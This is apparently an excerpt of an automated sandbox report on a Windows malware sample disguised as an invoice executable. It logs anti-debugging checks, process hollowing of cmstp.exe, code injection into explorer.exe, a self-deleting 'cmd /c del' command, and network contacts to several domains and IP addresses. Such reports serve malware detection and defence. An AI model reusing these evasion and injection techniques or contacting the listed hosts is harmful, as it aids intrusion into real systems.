          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04872D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04872D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04872D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04928DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_049041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04894120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04894120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04894120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04894120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04894120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04897D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04940EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04940EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04940EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0492FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04888A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04893A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0492FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04904257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0492B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0492B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04881B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04881B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0492D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0493138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04888794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04945BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0493131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0494070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0494070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04874F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04874F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00409B40 LdrLoadDll,
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.kalitelihavaperdesi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 51.161.86.13 80
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.165 80
          Source: C:\Windows\explorer.exeDomain query: www.ratqueen.art
          Source: C:\Windows\explorer.exeDomain query: www.piedmontpines.school
          Source: C:\Windows\explorer.exeDomain query: www.yuezhong66.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 350000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeMemory written: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe {path}
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
          Source: explorer.exe, 00000004.00000000.770612418.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.751676552.0000000001080000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.751676552.0000000001080000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.751676552.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.751676552.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
